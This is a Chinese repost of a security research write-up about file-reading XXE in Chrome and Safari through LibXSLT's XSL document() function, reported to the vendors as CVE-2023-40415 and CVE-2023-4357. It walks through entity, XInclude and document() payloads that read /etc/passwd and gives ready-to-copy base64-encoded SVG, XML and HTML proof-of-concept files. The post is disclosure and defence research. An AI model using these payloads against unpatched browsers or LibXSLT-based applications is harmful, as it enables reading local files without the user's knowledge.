使用 ChatGPT 在 Web 浏览器中获取 XXE

admin 2024年5月23日15:00:31评论18 views字数 13412阅读44分42秒阅读模式

使用 ChatGPT 在 Web 浏览器中获取 XXE

使用 ChatGPT 在 Web 浏览器中获取 XXE

一年前,我想知道禁用了 JavaScript 的恶意页面会做什么。

我知道 SVG 基于 XML,而且 XML 本身可能很复杂,并且允许文件访问。同源策略 (SOP) 是否对所有可能的 XML 和 SVG 语法进行了正确实施?通过 file:// 协议进行的访问是否得到正确处理?

由于我懒得阅读文档,所以我开始使用 ChatGPT 生成示例。

XSL

我决定测试的技术是 XSL。它代表可扩展样式表语言。它是一种基于 XML 的专用语言,可以在 XML 内部或外部使用来修改 XML 或检索数据。

Chrome中支持XSL,使用的库是LibXSLT。可以使用system-property('xsl:vendor')函数来验证这一点,如以下示例所示。

system-properties.xml

<?xml version="1.0" encoding="UTF-8"?>

<?xml-stylesheet href="system-properties.xsl" type="text/xsl"?>  

<root/>

system-properties.xsl

<?xml version="1.0" encoding="UTF-8"?>

<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">

<xsl:template match="/">

<p>

Version: <xsl:value-of select="system-property('xsl:version')" /> <br />

Vendor: <xsl:value-of select="system-property('xsl:vendor')" /> <br />

Vendor URL: <xsl:value-of select="system-property('xsl:vendor-url')" />

</p>

</xsl:template>

</xsl:stylesheet>

以下是system-properties.xml文件的输出,该文件已上传到本地 Web 服务器并在 Chrome 中打开:

使用 ChatGPT 在 Web 浏览器中获取 XXE

LibXSLT 库于 1999 年 9 月 23 日首次发布,由来已久且使用广泛。它是 Chrome、Safari、PHP、PostgreSQL、Oracle Database、Python 和许多其他应用程序中的默认组件。

ChatGPT 的第一个有趣的 XSL 输出是一个具有功能的代码,可让您检索当前文档的位置。虽然这不是漏洞,但在某些情况下可能很有用。

get-location.xml

<?xml-stylesheet href="get-location.xsl" type="text/xsl"?>  

<!DOCTYPE test [  

   <!ENTITY ent SYSTEM "?" NDATA aaa>  

]>

<test>

<getLocation test="ent"/>

</test>

get-location.xsl

<xsl:stylesheet version="1.0"  xmlns:xsl="http://www.w3.org/1999/XSL/Transform"  

>  

 <xsl:output method="html"/>  

 <xsl:template match="getLocation">  

         <input type="text" value="{unparsed-entity-uri(@test)}" />  

 </xsl:template>  

</xsl:stylesheet>

以下是将此代码上传到 Web 服务器后应看到的内容:

使用 ChatGPT 在 Web 浏览器中获取 XXE所有的魔力都发生在 unparsed-entity-uri() 函数中。此函数返回“ent”实体的完整路径,该实体是使用相对路径“?”构造的。

XSL 和远程内容

几乎所有基于 XML 的语言都具有可用于加载或显示远程文件的功能,类似于 HTML 中 <iframe> 标记的功能。

我多次向 ChatGPT 询问 XSL 的内容加载功能。下面的例子是 ChatGPT 建议我使用的,代码完全是从中获取的。

XML External Entities XML 外部实体

由于 XSL 是基于 XML 的,因此使用 XML 外部实体应该是第一个选项。

<?xml version="1.0"?>

<!DOCTYPE foo [

<!ENTITY xxe SYSTEM "file:///etc/passwd">

]>

<test>&xxe;</test>

XInclude

XInclude 是一个 XML 附加组件,在 2006 年 11 月 15 日的 W3C 推荐书中进行了描述。

<?xml version="1.0"?>

<test xmlns:xi="http://www.w3.org/2001/XInclude">

 <xi:include href="file:///etc/passwd"/>

</test>

XLS 的 <xsl:import> 和 <xsl:include> 标记

根据 ChatGPT 的说法,这些标签可用于将文件加载为 XSL 样式表。

<?xml version="1.0" ?>

<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">

 <xsl:include href="file:///etc/passwd"/>

 <xsl:import href="file:///etc/passwd"/>

</xsl:stylesheet>

XLS 的 document() 函数

XLS 的 document() 函数可用于将文件加载为 XML 文档。

<?xml version="1.0" encoding="UTF-8"?>

<xsl:stylesheet  version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">

 <xsl:template match="/">

   <xsl:copy-of select="document('file:///etc/passwd')"/>

 </xsl:template>

</xsl:stylesheet>

XXE

使用编辑过的 ChatGPT 输出,我制作了一个 XSL 文件,该文件利用数据协议将 document() 函数与参数文件中的 XML 外部实体相结合。接下来,我将 XSL 文件的内容插入到 XML 文件中,也使用数据协议。

当我通过手机的 HTTP URL 打开我的 XML 文件时,我震惊地看到我的 iOS /etc/hosts 文件!后来,我的朋友雅罗斯拉夫·巴宾(又名@yarbabin)在 Android 上证实了同样的结果!

使用 ChatGPT 在 Web 浏览器中获取 XXE

iOS + Safari iOS + Safari 浏览器

使用 ChatGPT 在 Web 浏览器中获取 XXE

Android + Chrome 安卓 + Chrome

接下来,我开始测试离线 HTML 到 PDF 工具,结果发现文件读取也在那里工作,尽管它们有内置限制。这不可能不是一个漏洞!这是我的智能电视的照片,文件读取也可以工作:

使用 ChatGPT 在 Web 浏览器中获取 XXE

我编制了一个表格,总结了我所有的测试:

使用 ChatGPT 在 Web 浏览器中获取 XXE

造成这种差异的可能根本原因是沙盒之间的差异。在 Windows 或 Linux 上运行带有该属性的 --no-sandbox Chrome 允许以当前用户身份读取任意文件。

其他检查

我已经测试了一些使用 LibXSLT 并且没有沙箱的应用程序。

  • PHP 允许控制 XSLTProcessor::importStylesheet 数据的应用程序可能会受到影响.

  • XMLSEC 该 document() 函数不允许 http(s):// 和 data: URL.

  • Oracle 该 document() 函数不允许 http(s):// 和 data: URL.

  • PostgreSQL 该 document() 函数不允许 http(s):// 和 data: URL.

默认的 PHP 配置禁用对外部实体 XML 和 XSL 文档的解析。但是,这不会影响 document() 函数加载的 XML 文档,并且 PHP 允许使用 LibXSLT 读取任意文件。

使用 ChatGPT 在 Web 浏览器中获取 XXE

根据我的测试,呼叫 libxml_set_external_entity_loader(function ($a) {}); 足以防止攻击。

POCs

您将在本节末尾的 ZIP 存档中找到所有 POC。请注意,这些不是零日漏洞;稍后还将提供有关向供应商报告和赏金信息的详细信息。

首先,我创建了一个包含多个 <iframe> 元素的简单 HTML 页面来测试所有可能的文件读取功能以及链接它们的所有可能方法:

使用 ChatGPT 在 Web 浏览器中获取 XXE

在过时的 Chrome 中打开 xxe_all_tests/test.html 页面的结果

在 Chrome、Safari 或类似 Electron 的应用中打开此页面。它可以读取具有默认沙盒设置的系统文件;如果没有沙盒,它可能会读取具有当前用户权限的任意文件。

正如你现在所看到的,只有一个调用链通向Chrome中的XXE,我们非常幸运地找到了它。为了更好地理解,以下是我对链的示意图:

使用 ChatGPT 在 Web 浏览器中获取 XXE接下来,我创建了缩小的 XML、SVG 和 HTML POC,您可以直接从文章中复制它们。

poc.svg

<?xml version="1.0" encoding="UTF-8"?><?xml-stylesheet type="text/xsl" href="data:text/xml;base64,PHhzbDpzdHlsZXNoZWV0IHZlcnNpb249IjEuMCIgeG1sbnM6eHNsPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L1hTTC9UcmFuc2Zvcm0iIHhtbG5zOnVzZXI9Imh0dHA6Ly9teWNvbXBhbnkuY29tL215bmFtZXNwYWNlIj4KPHhzbDpvdXRwdXQgbWV0aG9kPSJ4bWwiLz4KPHhzbDp0ZW1wbGF0ZSBtYXRjaD0iLyI+CjxzdmcgeG1sbnM9Imh0dHA6Ly93d3cudzMub3JnLzIwMDAvc3ZnIj4KPGZvcmVpZ25PYmplY3Qgd2lkdGg9IjMwMCIgaGVpZ2h0PSI2MDAiPgo8ZGl2IHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hodG1sIj4KTGlicmFyeTogPHhzbDp2YWx1ZS1vZiBzZWxlY3Q9InN5c3RlbS1wcm9wZXJ0eSgneHNsOnZlbmRvcicpIiAvPjx4c2w6dmFsdWUtb2Ygc2VsZWN0PSJzeXN0ZW0tcHJvcGVydHkoJ3hzbDp2ZXJzaW9uJykiIC8+PGJyIC8+IApMb2NhdGlvbjogPHhzbDp2YWx1ZS1vZiBzZWxlY3Q9InVucGFyc2VkLWVudGl0eS11cmkoLyovQGxvY2F0aW9uKSIgLz4gIDxici8+ClhTTCBkb2N1bWVudCgpIFhYRTogCjx4c2w6Y29weS1vZiAgc2VsZWN0PSJkb2N1bWVudCgnZGF0YTosJTNDJTNGeG1sJTIwdmVyc2lvbiUzRCUyMjEuMCUyMiUyMGVuY29kaW5nJTNEJTIyVVRGLTglMjIlM0YlM0UlMEElM0MlMjFET0NUWVBFJTIweHhlJTIwJTVCJTIwJTNDJTIxRU5USVRZJTIweHhlJTIwU1lTVEVNJTIwJTIyZmlsZTovLy9ldGMvcGFzc3dkJTIyJTNFJTIwJTVEJTNFJTBBJTNDeHhlJTNFJTBBJTI2eHhlJTNCJTBBJTNDJTJGeHhlJTNFJykiLz4KPC9kaXY+CjwvZm9yZWlnbk9iamVjdD4KPC9zdmc+CjwveHNsOnRlbXBsYXRlPgo8L3hzbDpzdHlsZXNoZWV0Pg=="?><!DOCTYPE svg [      <!ENTITY ent SYSTEM "?" NDATA aaa>  ]><svg location="ent" />

poc.xml

<?xml version="1.0" encoding="UTF-8"?><?xml-stylesheet type="text/xsl" href="data:text/xml;base64,PHhzbDpzdHlsZXNoZWV0IHZlcnNpb249IjEuMCIgeG1sbnM6eHNsPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L1hTTC9UcmFuc2Zvcm0iIHhtbG5zOnVzZXI9Imh0dHA6Ly9teWNvbXBhbnkuY29tL215bmFtZXNwYWNlIj4KPHhzbDpvdXRwdXQgdHlwZT0iaHRtbCIvPgo8eHNsOnRlbXBsYXRlIG1hdGNoPSJ0ZXN0MSI+CjxodG1sPgpMaWJyYXJ5OiA8eHNsOnZhbHVlLW9mIHNlbGVjdD0ic3lzdGVtLXByb3BlcnR5KCd4c2w6dmVuZG9yJykiIC8+PHhzbDp2YWx1ZS1vZiBzZWxlY3Q9InN5c3RlbS1wcm9wZXJ0eSgneHNsOnZlcnNpb24nKSIgLz48YnIgLz4gCkxvY2F0aW9uOiA8eHNsOnZhbHVlLW9mIHNlbGVjdD0idW5wYXJzZWQtZW50aXR5LXVyaShAbG9jYXRpb24pIiAvPiAgPGJyLz4KWFNMIGRvY3VtZW50KCkgWFhFOiAKPHhzbDpjb3B5LW9mICBzZWxlY3Q9ImRvY3VtZW50KCdkYXRhOiwlM0MlM0Z4bWwlMjB2ZXJzaW9uJTNEJTIyMS4wJTIyJTIwZW5jb2RpbmclM0QlMjJVVEYtOCUyMiUzRiUzRSUwQSUzQyUyMURPQ1RZUEUlMjB4eGUlMjAlNUIlMjAlM0MlMjFFTlRJVFklMjB4eGUlMjBTWVNURU0lMjAlMjJmaWxlOi8vL2V0Yy9wYXNzd2QlMjIlM0UlMjAlNUQlM0UlMEElM0N4eGUlM0UlMEElMjZ4eGUlM0IlMEElM0MlMkZ4eGUlM0UnKSIvPgo8L2h0bWw+CjwveHNsOnRlbXBsYXRlPgo8L3hzbDpzdHlsZXNoZWV0Pg=="?><!DOCTYPE test [      <!ENTITY ent SYSTEM "?" NDATA aaa>  ]><test1 location="ent"/>

poc.html

<html><head><title>LibXSLT document() XXE tests</title></head><body>SVG<br/><iframe src=""></iframe><br/>SVG WIN<br/><iframe src=""></iframe><br/>XML<br/><iframe src="data:text/xml;base64,PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiPz4KPD94bWwtc3R5bGVzaGVldCB0eXBlPSJ0ZXh0L3hzbCIgaHJlZj0iZGF0YTp0ZXh0L3htbDtiYXNlNjQsUEhoemJEcHpkSGxzWlhOb1pXVjBJSFpsY25OcGIyNDlJakV1TUNJZ2VHMXNibk02ZUhOc1BTSm9kSFJ3T2k4dmQzZDNMbmN6TG05eVp5OHhPVGs1TDFoVFRDOVVjbUZ1YzJadmNtMGlJSGh0Ykc1ek9uVnpaWEk5SW1oMGRIQTZMeTl0ZVdOdmJYQmhibmt1WTI5dEwyMTVibUZ0WlhOd1lXTmxJajRLUEhoemJEcHZkWFJ3ZFhRZ2RIbHdaVDBpYUhSdGJDSXZQZ284ZUhOc09uUmxiWEJzWVhSbElHMWhkR05vUFNKMFpYTjBNU0krQ2p4b2RHMXNQZ3BNYVdKeVlYSjVPaUE4ZUhOc09uWmhiSFZsTFc5bUlITmxiR1ZqZEQwaWMzbHpkR1Z0TFhCeWIzQmxjblI1S0NkNGMydzZkbVZ1Wkc5eUp5a2lJQzgrUEhoemJEcDJZV3gxWlMxdlppQnpaV3hsWTNROUluTjVjM1JsYlMxd2NtOXdaWEowZVNnbmVITnNPblpsY25OcGIyNG5LU0lnTHo0OFluSWdMejRnQ2t4dlkyRjBhVzl1T2lBOGVITnNPblpoYkhWbExXOW1JSE5sYkdWamREMGlkVzV3WVhKelpXUXRaVzUwYVhSNUxYVnlhU2hBYkc5allYUnBiMjRwSWlBdlBpQWdQR0p5THo0S1dGTk1JR1J2WTNWdFpXNTBLQ2tnV0ZoRk9pQUtQSGh6YkRwamIzQjVMVzltSUNCelpXeGxZM1E5SW1SdlkzVnRaVzUwS0Nka1lYUmhPaXdsTTBNbE0wWjRiV3dsTWpCMlpYSnphVzl1SlRORUpUSXlNUzR3SlRJeUpUSXdaVzVqYjJScGJtY2xNMFFsTWpKVlZFWXRPQ1V5TWlVelJpVXpSU1V3UVNVelF5VXlNVVJQUTFSWlVFVWxNakI0ZUdVbE1qQWxOVUlsTWpBbE0wTWxNakZGVGxSSlZGa2xNakI0ZUdVbE1qQlRXVk5VUlUwbE1qQWxNakptYVd4bE9pOHZMMlYwWXk5d1lYTnpkMlFsTWpJbE0wVWxNakFsTlVRbE0wVWxNRUVsTTBONGVHVWxNMFVsTUVFbE1qWjRlR1VsTTBJbE1FRWxNME1sTWtaNGVHVWxNMFVuS1NJdlBnbzhMMmgwYld3K0Nqd3ZlSE5zT25SbGJYQnNZWFJsUGdvOEwzaHpiRHB6ZEhsc1pYTm9aV1YwUGc9PSI/Pgo8IURPQ1RZUEUgdGVzdCBbICAKICAgIDwhRU5USVRZIGVudCBTWVNURU0gIj8iIE5EQVRBIGFhYT4gICAKXT4KPHRlc3QxIGxvY2F0aW9uPSJlbnQiLz4="></iframe><br/>XML WIN<br/><iframe src="data:text/xml;base64,PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiPz4KPD94bWwtc3R5bGVzaGVldCB0eXBlPSJ0ZXh0L3hzbCIgaHJlZj0iZGF0YTp0ZXh0L3htbDtiYXNlNjQsUEhoemJEcHpkSGxzWlhOb1pXVjBJSFpsY25OcGIyNDlJakV1TUNJZ2VHMXNibk02ZUhOc1BTSm9kSFJ3T2k4dmQzZDNMbmN6TG05eVp5OHhPVGs1TDFoVFRDOVVjbUZ1YzJadmNtMGlJSGh0Ykc1ek9uVnpaWEk5SW1oMGRIQTZMeTl0ZVdOdmJYQmhibmt1WTI5dEwyMTVibUZ0WlhOd1lXTmxJajRLUEhoemJEcHZkWFJ3ZFhRZ2RIbHdaVDBpYUhSdGJDSXZQZ284ZUhOc09uUmxiWEJzWVhSbElHMWhkR05vUFNKMFpYTjBNU0krQ2p4b2RHMXNQZ3BNYVdKeVlYSjVPaUE4ZUhOc09uWmhiSFZsTFc5bUlITmxiR1ZqZEQwaWMzbHpkR1Z0TFhCeWIzQmxjblI1S0NkNGMydzZkbVZ1Wkc5eUp5a2lJQzgrSmlONE1qQTdQSGh6YkRwMllXeDFaUzF2WmlCelpXeGxZM1E5SW5ONWMzUmxiUzF3Y205d1pYSjBlU2duZUhOc09uWmxjbk5wYjI0bktTSWdMejQ4WW5JZ0x6NGdDa3h2WTJGMGFXOXVPaUE4ZUhOc09uWmhiSFZsTFc5bUlITmxiR1ZqZEQwaWRXNXdZWEp6WldRdFpXNTBhWFI1TFhWeWFTaEFiRzlqWVhScGIyNHBJaUF2UGlBZ1BHSnlMejRLV0ZOTUlHUnZZM1Z0Ym1WMEtDa2dXRmhGT2lBS1BIaHpiRHBqYjNCNUxXOW1JQ0J6Wld4bFkzUTlJbVJ2WTNWdFpXNTBLQ2RrWVhSaE9pd2xNME1sTTBaNGJXd2xNakIyWlhKemFXOXVKVE5FSlRJeU1TNHdKVEl5SlRJd1pXNWpiMlJwYm1jbE0wUWxNakpWVkVZdE9DVXlNaVV6UmlVelJTVXdRU1V6UXlVeU1VUlBRMVJaVUVVbE1qQjRlR1VsTWpBbE5VSWxNakFsTTBNbE1qRkZUbFJKVkZrbE1qQjRlR1VsTWpCVFdWTlVSVTBsTWpBbE1qSm1hV3hsT2k4dkwyTTZMM2RwYm1SdmQzTXZjM2x6ZEdWdExtbHVhU1V5TWlVelJTVXlNQ1UxUkNVelJTVXdRU1V6UTNoNFpTVXpSU1V3UVNVeU5uaDRaU1V6UWlVd1FTVXpReVV5Um5oNFpTVXpSU2NwSWk4K0Nqd3ZhSFJ0YkQ0S1BDOTRjMnc2ZEdWdGNHeGhkR1UrQ2p3dmVITnNPbk4wZVd4bGMyaGxaWFErIj8+CjwhRE9DVFlQRSB0ZXN0IFsgIAogICAgPCFFTlRJVFkgZW50IFNZU1RFTSAiPyIgTkRBVEEgYWFhPiAgIApdPgo8dGVzdDEgbG9jYXRpb249ImVudCIvPg=="></iframe><br/></body>

用于测试的 ZIP 存档:libxslt.zip

https://swarm.ptsecurity.com/wp-content/uploads/2024/05/d34e0a53-libxslt.zip

赏金

所有发现均立即报告给供应商。

使用 ChatGPT 在 Web 浏览器中获取 XXE

苹果浏览器

苹果实施了沙盒补丁。分配的 CVE:CVE-2023-40415。奖励:25,000 美元。💰

Chrome

Google 实施了该补丁,并加强了 XSL 函数加载的文档的安全性document()。分配的 CVE:CVE-2023-4357。奖励:3,000 美元。💸

链接

  • https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-40415

  • https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-4357

  • https://issues.chromium.org/issues/40066577

Getting XXE in Web Browsers using ChatGPThttps://swarm.ptsecurity.com/xxe-chrome-safari-chatgpt/

原文始发于微信公众号(Ots安全):使用 ChatGPT 在 Web 浏览器中获取 XXE

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年5月23日15:00:31
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   使用 ChatGPT 在 Web 浏览器中获取 XXEhttp://cn-sec.com/archives/2769920.html

发表评论

匿名网友 填写信息